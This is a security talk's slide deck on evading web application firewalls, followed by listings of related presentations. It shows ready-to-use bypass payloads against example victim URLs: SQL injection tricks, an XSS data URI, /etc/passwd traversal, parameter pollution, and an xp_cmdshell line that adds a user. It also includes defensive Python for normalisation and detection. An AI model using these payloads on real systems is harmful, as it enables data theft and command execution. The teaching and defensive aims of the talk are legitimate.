Web Application Firewall (WAF)
    Suckseed or Succeed !?


Mr.Prathan Phongthiproek
Consulting Manager, Red Team
ACIS Professional Center
Who am I ?

ACIS Professional Center

   Manager of the Red Team

   Specializing in Attack & Penetration

   Information Security Consulting Manager

   Instructor and Speaker

Founder of CWH Underground Hacker

   Aka 0x7a657133756c
Let’s Reveal
Introduction to Web Application Firewall (WAF)

Breach it !!
  Filter Evasion

  HTTP Parameter Contamination

  HTTP Pollution: Split and Join


Conclusion
Introduction to Web Application Firewall (WAF)
Web Application Hacking

7 of 10 sites are vulnerable

70% of Cyber attacks are on web ports

95% of companies are hacked through
web ports

Anonymous and LulzSec

Hacker groups running operations such as #AntiSec
Web Application Hacking

Top 3 Web App Attacks
 Cross Site Scripting

 File Inclusion (Remote/Local)

 SQL Injection (Normal/Blind/Time based/Regex...)
A common misunderstanding about hardening web applications
What’s WAF ?

Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks

Usually contain many complex regular-expression rules that match known attack patterns (blacklist)

For most commercial WAF vendors the rules are "closely guarded secrets"

Open-source WAFs (ModSecurity and PHPIDS) publish their rules
Understand Blacklist
Detection and Protection
SQL Injection


Cross Site Scripting


Local and Remote File Inclusion


Code/Command Injection


Directory Traversal


Buffer Overflow


Cookie Poisoning


Parameter Tampering


Upload File Mis-Handling


Information Disclosure


Etc...
WAFs Vendors
Armorize               Bee-ware

Barracuda              BinarySec

Cisco ACE              Mod Security

Citrix Netscaler       WebKnight

F5                     DenyAll

Imperva SecureSphere   Fortify

Radware Appwall        Visonys

Profense               Pentasecurity

                       Other..
WAF implementation
Breach it !! (CMS and WAFs)
      "Under control, under con.......it has burst already"
Filter Evasion (SQLi)

PHP: magic_quotes on, mysql_real_escape_string(), addslashes()
 ' "  ->  \' \"

 With a quoted string (the quotes get escaped, so the query breaks):
 id=1 and 1=2 union select 1,group_concat(column_name)
 from information_schema.columns where
 table_name='users'

 Same query with the string written as a hex literal (no quotes needed):
 id=1 and 1=2 union select 1,group_concat(column_name)
 from information_schema.columns where
 table_name=0x7573657273

 String written as ASCII codes via CHAR() (no quotes needed):
 id=1 and 1=2 union select 1,load_file(CHAR
 (47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102
 ,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
Filter Evasion (SQLi)

Comments
 //, --, /**/, /*, #, %00

 id=1+un/**/ion+se/**/lect+1,2,3--


Case changing (the filter only matches lower case)

 /union\sselect/g

 id=1+UnIoN/**/SeLecT/**/1,2,3--


Replaced keywords (the filter strips each keyword once; what remains re-forms it)
 id=1+UnunionIoN+SeselectLecT+1,2,3--
Filter Evasion (SQLi)

Case Study: NukeSentinel (PHP-Nuke)
 URL-encode the comment characters as hex

 Forbidden: http://victim.com/php-nuke/?/**/union/**/select.......

 Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select.......

 Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......
Filter Evasion (SQLi)

Buffer overflow (against filters written in C): a very long value placed in front of the injection
 id=1+and+(select 1)=(Select
 0x41414141414141414141414141414141.....)+UnIoN+SeLecT
 +1,version(),3,database(),user(),6,7,8,9,10--
Filter Evasion (SQLi)

Inline comments (/*!......*/)
 Many WAFs were bypassed this way

 Also bypasses IPS and timeouts

 MySQL only (http://dev.mysql.com/doc/refman/5.0/en/comments.html)

 /union\sselect/ig

 id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)
 +FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
Filter Evasion (SQLi)

Other bypasses (equivalent operators and functions):
 and -> &&
 or -> ||
 = -> like
 substring() -> substr(), mid(), strcmp()
 ascii() -> hex(), bin(), char(), ord()
 benchmark() -> sleep()
 whitespace -> (), /**/, %0b
 isnull, between
Filter Evasion (SQLi)

Case Study: PHPIDS
Filter Evasion (SQLi)

   Case Study: ModSecurity CRS (rule 959047)

SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \
  "phase:2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace, \
  ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047', \
  tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2', \
  logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}', \
  setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score}, \
  setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, \
  setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
Filter Evasion (SQLi)

Case Study: ModSecurity CRS
 http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

 Decoded parameter value (three lines, split at the %0D%0A sequences):
   0 div 1 union#foo*/*bar
   select#foo
   1,2,current_user

 MySQL drops the # line comments and executes:
   0 div 1 union select 1,2,current_user

 The rule's t:replaceComments, by contrast, treats the unterminated /* as a comment running to the end of the value, so the regex never sees the select.
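The mismatch above (the rule's transformation chain versus what MySQL actually parses) can be checked mechanically. The following Python script is an added example, not code from the talk or from the ModSecurity project: it models the quoted rule's t:urlDecodeUni, t:lowercase, t:replaceComments and t:compressWhiteSpace chain on one side and MySQL's comment handling on the other, runs the rule's regex against both views of the two payloads from these slides (the CRS case study and the earlier inline-comment example), and shows that normalising the way the backend lexer does makes the same regex fire. replace_comments, crs_view, mysql_view, backend_aware_view and rule_fires are names chosen here, and both comment models are simplifications of the real implementations.

```python
import re
from urllib.parse import unquote

# Pattern of CRS rule 959047 as quoted on the slide (backslashes restored).
UNION_SELECT = re.compile(r"\bunion\b.{1,100}?\bselect\b")

# The two request values shown on the slides, URL-encoded as they travel on the wire.
CRS_SLIDE_PAYLOAD = "0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user"
INLINE_COMMENT_PAYLOAD = ("1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)"
                          "+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--")


def replace_comments(s):
    """Model of ModSecurity t:replaceComments: every /* ... */ becomes one space and,
    as the ModSecurity reference states, an unterminated /* is replaced by a space too,
    which silently discards the rest of the value."""
    out, i = [], 0
    while True:
        start = s.find("/*", i)
        if start == -1:
            out.append(s[i:])
            return "".join(out)
        out.append(s[i:start] + " ")
        end = s.find("*/", start + 2)
        if end == -1:
            return "".join(out)          # unterminated comment: the remainder is gone
        i = end + 2


def crs_view(raw):
    """Model of the rule's chain t:urlDecodeUni, t:lowercase, t:replaceComments,
    t:compressWhiteSpace (t:htmlEntityDecode changes nothing for these inputs)."""
    s = unquote(raw.replace("+", " ")).lower()
    return re.sub(r"\s+", " ", replace_comments(s))


def mysql_view(raw):
    """Simplified model of how MySQL's lexer sees the decoded value: '#' and '-- '
    comments run to end of line, /* ... */ is dropped, and the body of an executable
    comment /*!NNNNN ... */ is kept (real MySQL only strips a 5-digit version prefix)."""
    s = unquote(raw.replace("+", " "))
    out, i, n = [], 0, len(s)
    while i < n:
        if s[i] == "#" or (s.startswith("--", i) and (i + 2 >= n or s[i + 2].isspace())):
            nl = s.find("\n", i)
            out.append(" ")
            i = n if nl == -1 else nl
        elif s.startswith("/*", i):
            end = s.find("*/", i + 2)
            body = s[i + 2:n if end == -1 else end]
            out.append(" " + body[1:].lstrip("0123456789") + " " if body.startswith("!") else " ")
            i = n if end == -1 else end + 2
        else:
            out.append(s[i])
            i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip()


def backend_aware_view(raw):
    """Normalise the way the backend lexer will, then let the rule look at that."""
    return mysql_view(raw).lower()


def rule_fires(view, raw):
    return UNION_SELECT.search(view(raw)) is not None


if __name__ == "__main__":
    for name, payload in (("CRS slide", CRS_SLIDE_PAYLOAD), ("inline comments", INLINE_COMMENT_PAYLOAD)):
        print(name)
        print("  WAF sees       :", repr(crs_view(payload)))
        print("  MySQL executes :", repr(mysql_view(payload)))
        print("  rule fires on WAF view:", rule_fires(crs_view, payload),
              "| on backend-aware view:", rule_fires(backend_aware_view, payload))
```

The point of running both views side by side is that a signature is only as good as the normalisation in front of it: the rule above is correct for plain "union select" input, and it fails here purely because its transformations disagree with the database's lexer. ModSecurity also ships t:removeComments, which treats --, # and /* */ alike; the wider lesson is to test every rule against the backend's view of the data, not only the request as received.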
Filter Evasion

Cross Site Scripting (XSS)
 Forbidden: http://victim.com/search.php?q=javascript:alert('XSS')

 Bypass (the same script tag, base64-encoded inside a data: URI):
 http://victim.com/search.php?q=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=


File Inclusion
 Forbidden: http://victim.com/download.php?file=../../../etc/passwd

 Bypass: http://victim.com/download.php?file=../../../etc/passwd..........

 Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../passwd
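The two file-inclusion bypasses above work because the blacklist matches one spelling of the path rather than the path it resolves to. The Python below is an added example, not code from the talk or from the download.php on the slide: it contrasts such a literal signature with canonicalising the requested name and accepting it only if it stays under the document root. BASE_DIR is an assumed directory, and TRAVERSAL_SIGNATURE, signature_blocks and resolve_inside are names chosen here.

```python
import posixpath
import re

# Assumed document root that the download handler serves from (constructed for this example).
BASE_DIR = "/var/www/files"

# A literal signature of the kind the "Forbidden" request on the slide trips.
TRAVERSAL_SIGNATURE = re.compile(r"\.\./\.\./\.\./etc/passwd$")

# The three values of the file parameter shown on the slide.
SLIDE_REQUESTS = [
    "../../../etc/passwd",
    "../../../etc/passwd..........",
    "../../../foo/../etc/bar/../passwd",
]


def signature_blocks(user_path):
    """The blacklist approach: match the literal attack string."""
    return TRAVERSAL_SIGNATURE.search(user_path) is not None


def resolve_inside(base_dir, user_path):
    """Canonicalise the requested name and accept it only if it stays under base_dir.
    Returns the resolved path, or None when the request must be refused."""
    base = posixpath.normpath(base_dir)
    if posixpath.isabs(user_path) or "\0" in user_path:
        return None                      # absolute names and NUL bytes are never valid here
    resolved = posixpath.normpath(posixpath.join(base, user_path))
    if not resolved.startswith(base + "/"):
        return None                      # left the directory, however the path was spelled
    return resolved


if __name__ == "__main__":
    for req in SLIDE_REQUESTS + ["report.pdf", "sub/../report.pdf"]:
        print(f"{req!r:45} signature blocks: {signature_blocks(req)!s:5} "
              f"resolves to: {resolve_inside(BASE_DIR, req)}")
```

Note that the containment check compares against base plus a trailing slash: a bare prefix test would accept a sibling directory such as /var/www/files2. The check is deliberately pure (posixpath.normpath, no filesystem access); a handler that follows symbolic links would additionally need os.path.realpath on the result.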
HTTP Parameter Contamination

Bypass ModSecurity SQLi rule (modsecurity_crs_41)

Bypass URLScan 3.1 DenyQueryStringSequences rules

Bypass AQTRONIX WebKnight WAF with "%"

Case Study: AQTRONIX WebKnight
  http://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)

  What the WAF inspects:
  10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)

  What the ASP application receives once the stray "%" characters are dropped:
  10 and 1=0/(select top 1 table_name from information_schema.tables)
HTTP Pollution: Split and Join

 HPP is a simple but effective technique

 HPP attacks can be defined as the ability to override or add HTTP GET/POST parameters by injecting extra query-string parameters

 Focus here on ASP/ASP.NET, which join repeated parameters with a comma

 Many WAFs were bypassed
HTTP Pollution: Split and Join

 Basic Attack

  Forbidden: http://victim.com/search.aspx?q=select name,password from user

  Bypass: http://victim.com/search.aspx?q=select name&q=password from user

  The WAF inspects two separate values:
    q=select name
    q=password from user

  ASP.NET joins them with a comma, so the application receives:
    q=select name,password from user
HTTP Pollution: Split and Join

 HPP + inline comments (bypasses a commercial WAF)

  Forbidden: http://victim.com/search.aspx?q=select name,password from user

  Bypass: http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user

  Parameter occurrences as the WAF sees them:
    q=select/*
    q=*/name
    q=password/*
    q=*/from/*
    q=*/user

  After the comma join, and then after the database discards the comments:
    q=select/*,*/name,password/*,*/from/*,*/user
    q=select name,password from user
HTTP Pollution: Split and Join
          Case study: IBM Web Application Firewall (2011-6-21)

            Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT /add" --

            Bypass: http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ "net user lucifer UrWaFisShiT" /*&id=1*/ --

            Parameter occurrences as the WAF sees them:
              id=1';   /*
              id=1*/   EXEC /*
              id=1*/   master..xp_cmdshell /*
              id=1*/   "net user lucifer UrWaFisShiT" /*
              id=1*/   --

            After the comma join, and then after the database discards the comments:
              id=1'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "net user lucifer UrWaFisShiT" /*,1*/ --
              id=1'; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT" --
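All three split-and-join cases above rely on the WAF inspecting each occurrence of q (or id) on its own while ASP.NET hands the application the comma-joined string. The Python below is an added example, not code from the talk or from any WAF product: it rebuilds the value the way ASP.NET does before matching a signature, using the two search.aspx query strings from the slides, and adds the cheapest detection signal for this class of request, a repeated parameter name. SELECT_FROM is a constructed stand-in for a real rule, and join_like_aspnet, per_occurrence_waf_blocks, backend_aware_waf_blocks and duplicate_parameter_names are names chosen here.

```python
import re
from urllib.parse import parse_qsl

# Illustrative SQLi signature in the style of the CRS rule on the earlier slides (constructed).
SELECT_FROM = re.compile(r"\bselect\b.{1,100}?\bfrom\b", re.I)

# The two search.aspx query strings from the slides, exactly as shown there.
BASIC_HPP = "q=select name&q=password from user"
HPP_WITH_COMMENTS = "q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user"


def occurrences(query):
    """Every (name, value) pair in order, repeats included."""
    return parse_qsl(query, keep_blank_values=True)


def join_like_aspnet(query):
    """ASP/ASP.NET give the application one string per name, repeats joined with ','."""
    merged = {}
    for name, value in occurrences(query):
        merged[name] = value if name not in merged else merged[name] + "," + value
    return merged


def strip_block_comments(s):
    """Drop /* ... */ the way the SQL engine will; an unterminated one is left alone."""
    return re.sub(r"/\*.*?\*/", " ", s, flags=re.S)


def per_occurrence_waf_blocks(query):
    """A filter that inspects each parameter occurrence separately (the bypassed behaviour)."""
    return any(SELECT_FROM.search(strip_block_comments(v)) for _, v in occurrences(query))


def backend_aware_waf_blocks(query):
    """A filter that first rebuilds the value exactly as the backend will, then inspects it."""
    return any(SELECT_FROM.search(strip_block_comments(v)) for v in join_like_aspnet(query).values())


def duplicate_parameter_names(query):
    """Detection signal: names that occur more than once, which most applications never send."""
    seen, dupes = set(), set()
    for name, _ in occurrences(query):
        if name in seen:
            dupes.add(name)
        seen.add(name)
    return sorted(dupes)


if __name__ == "__main__":
    for q in (BASIC_HPP, HPP_WITH_COMMENTS, "q=hello&page=2"):
        print(q)
        print("  joined by ASP.NET      :", join_like_aspnet(q))
        print("  per-occurrence blocks  :", per_occurrence_waf_blocks(q))
        print("  backend-aware blocks   :", backend_aware_waf_blocks(q))
        print("  duplicate names        :", duplicate_parameter_names(q))
```

The join rule is platform-specific (ASP.NET joins with a comma, PHP keeps only the last occurrence, and other stacks differ), so a WAF that inspects reconstructed values has to know which backend sits behind each virtual host. Where that is not practical, flagging or rejecting duplicate names for parameters the application never repeats is a far simpler control than chasing every split variant.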
"Thailand needs change. It is time for everyone in the country to wake up; ignorance must come to an end."
How to protect your website?

Implement a Secure Software Development Life Cycle (SSDLC)

Secure coding: validate all inputs and outputs

Pentest before going online

Harden it!!

Revisit it regularly

Deploy a WAF (optional)
Conclusion
  WAF does not live up to what was long expected of it:

    Because of its functional limitations, a WAF is not able to protect a
    web app from all possible vulnerabilities

    The WAF filters must be adapted to the particular web app being protected

  A WAF doesn't eliminate a vulnerability; it only partly screens the attack vector

  Does it suckseed or succeed!?

"Security products are not able to 100% protect against damn config/coding by admins. It just takes time and imagination to breach them!!"
Greetz To..

ACIS-Red Team

Kyle

Johannes Dahse

Ahmad Maulana

Luca Carettoni

Stefano di Paola

Ivan Markovic

All WAF products that I breached

Contenu connexe

Tendances

CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2Zero Science Lab
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Owasp universal-http-do s
Owasp universal-http-do sOwasp universal-http-do s
Owasp universal-http-do sE Hacking
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
HackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafHackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafIMMUNIO
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 

Tendances (20)

CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Owasp universal-http-do s
Owasp universal-http-do sOwasp universal-http-do s
Owasp universal-http-do s
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
HackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs wafHackFest 2015 - Rasp vs waf
HackFest 2015 - Rasp vs waf
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Secure code
Secure codeSecure code
Secure code
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security Tools
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
S8-Session Managment
S8-Session ManagmentS8-Session Managment
S8-Session Managment
 

En vedette

Comision negociadora convenio champion
Comision negociadora convenio championComision negociadora convenio champion
Comision negociadora convenio championoscargaliza
 
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...TDR d.o.o Rovinj
 
Acta mediterranea de catering pontevedra
Acta mediterranea de catering pontevedraActa mediterranea de catering pontevedra
Acta mediterranea de catering pontevedraoscargaliza
 
21.01.2014 - Ubuntu server 13.04
21.01.2014 - Ubuntu server 13.0421.01.2014 - Ubuntu server 13.04
21.01.2014 - Ubuntu server 13.04El Alex Andrade
 
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultatiTDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultatiTDR d.o.o Rovinj
 
Sentencia elecciones carrefour ourense
Sentencia elecciones carrefour ourenseSentencia elecciones carrefour ourense
Sentencia elecciones carrefour ourenseoscargaliza
 
Fdisk אתר המדריכים של פורום חלונות
Fdisk   אתר המדריכים של פורום חלונותFdisk   אתר המדריכים של פורום חלונות
Fdisk אתר המדריכים של פורום חלונותhaimkarel
 
Sistemas De Apoio a Decisão
Sistemas De Apoio a DecisãoSistemas De Apoio a Decisão
Sistemas De Apoio a DecisãoWillame Tiberio
 
Acordo hesperia illa da toxa
Acordo hesperia illa da toxaAcordo hesperia illa da toxa
Acordo hesperia illa da toxaoscargaliza
 
Sana's group's presentation
Sana's group's presentationSana's group's presentation
Sana's group's presentationSana Samad
 
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)oscargaliza
 
BridgeAtMainALA2015
BridgeAtMainALA2015BridgeAtMainALA2015
BridgeAtMainALA2015mel gooch
 
Digital Drawing Workbook: Draw a Dragon Using Paint Editor
Digital Drawing Workbook: Draw a Dragon Using Paint EditorDigital Drawing Workbook: Draw a Dragon Using Paint Editor
Digital Drawing Workbook: Draw a Dragon Using Paint EditorDigital Animation for Kids, LLC
 
Fnac acta ci_fnac_29_abril_2010
Fnac acta ci_fnac_29_abril_2010Fnac acta ci_fnac_29_abril_2010
Fnac acta ci_fnac_29_abril_2010oscargaliza
 

En vedette (20)

Comision negociadora convenio champion
Comision negociadora convenio championComision negociadora convenio champion
Comision negociadora convenio champion
 
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
Prezentacija rezultata TDR poslovanja u 2013. godini na tržištu Bosne i Herce...
 
Brukeroppførsel
BrukeroppførselBrukeroppførsel
Brukeroppførsel
 
Acta mediterranea de catering pontevedra
Acta mediterranea de catering pontevedraActa mediterranea de catering pontevedra
Acta mediterranea de catering pontevedra
 
21.01.2014 - Ubuntu server 13.04
21.01.2014 - Ubuntu server 13.0421.01.2014 - Ubuntu server 13.04
21.01.2014 - Ubuntu server 13.04
 
เศรษฐศาสตร์เบื้องต้น
เศรษฐศาสตร์เบื้องต้นเศรษฐศาสตร์เบื้องต้น
เศรษฐศาสตร์เบื้องต้น
 
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultatiTDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
TDR - regionalni lider - inovacije kao temelj rasta - poslovni rezultati
 
Sentencia elecciones carrefour ourense
Sentencia elecciones carrefour ourenseSentencia elecciones carrefour ourense
Sentencia elecciones carrefour ourense
 
Fdisk אתר המדריכים של פורום חלונות
Fdisk   אתר המדריכים של פורום חלונותFdisk   אתר המדריכים של פורום חלונות
Fdisk אתר המדריכים של פורום חלונות
 
Operation outbreak
Operation outbreakOperation outbreak
Operation outbreak
 
Sistemas De Apoio a Decisão
Sistemas De Apoio a DecisãoSistemas De Apoio a Decisão
Sistemas De Apoio a Decisão
 
Acordo hesperia illa da toxa
Acordo hesperia illa da toxaAcordo hesperia illa da toxa
Acordo hesperia illa da toxa
 
Sana's group's presentation
Sana's group's presentationSana's group's presentation
Sana's group's presentation
 
India Horizontal Plant
India Horizontal PlantIndia Horizontal Plant
India Horizontal Plant
 
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
BridgeAtMainALA2015
BridgeAtMainALA2015BridgeAtMainALA2015
BridgeAtMainALA2015
 
Digital Drawing Workbook: Draw a Dragon Using Paint Editor
Digital Drawing Workbook: Draw a Dragon Using Paint EditorDigital Drawing Workbook: Draw a Dragon Using Paint Editor
Digital Drawing Workbook: Draw a Dragon Using Paint Editor
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
 
Fnac acta ci_fnac_29_abril_2010
Fnac acta ci_fnac_29_abril_2010Fnac acta ci_fnac_29_abril_2010
Fnac acta ci_fnac_29_abril_2010
 

Similaire à Introduction to Web Application Firewall (WAF

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionDaniel Owens
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Technical Architecture of RASP Technology
Technical Architecture of RASP TechnologyTechnical Architecture of RASP Technology
Technical Architecture of RASP TechnologyPriyanka Aash
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsYan Cui
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentationowaspsd
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
